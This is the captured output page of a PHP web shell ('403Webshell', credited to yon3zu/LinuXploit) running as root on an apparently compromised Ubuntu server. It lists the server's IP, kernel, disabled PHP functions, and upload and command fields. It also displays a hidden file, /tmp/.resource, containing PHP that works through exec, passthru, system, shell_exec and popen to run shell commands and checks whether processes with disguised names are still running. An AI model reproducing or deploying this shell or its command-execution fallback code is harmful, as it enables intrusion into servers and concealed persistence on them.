403Webshell
Server IP : 43.129.54.214  /  Your IP : 216.73.217.113
Web Server : nginx/1.24.0
System : Linux VM-4-108-ubuntu 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64
User : root ( 0)
PHP Version : 8.3.6
Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /tmp/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /tmp//.resource
<?php   $files = ['upload_bak','config.image','meta_tags','enrol_flatfile','visualfoxpro','payments_request','jpgraph_pie','mm3_panel','insertdialog25','changemail','discografia','whats_new','temp.gsconfig','headquarters','izap_rss_news','podcastLib.class','recette_bigstory','edit.writer','html_output','route_drafts','avisynth','sanitizing.lib','leadership','album_comment','send_promote','research_buttons','upper_left_menu','send_invitations','mod_banners','norwegian_mimes']; foreach ($files as $f) {     $res = @run("pgrep {$f}");     if (!preg_match('/\d+/', $res)) {         die("<f>{$f}</f>");     } } die('!ended!');  function run($in) {     $out = '';     if (function_exists('exec')) {         @exec($in, $out);         $out = @join("\n", $out);     } elseif (function_exists('passthru')) {         ob_start();         @passthru($in);         $out = ob_get_clean();     } elseif (function_exists('system')) {         ob_start();         @system($in);         $out = ob_get_clean();     } elseif (function_exists('shell_exec')) {         $out = shell_exec($in);     } elseif (is_resource($f = @popen($in, "r"))) {         $out = "";         while (!@feof($f))             $out .= fread($f, 1024);         pclose($f);     }     return $out; } 

Youez - 2016 - github.com/yon3zu
LinuXploit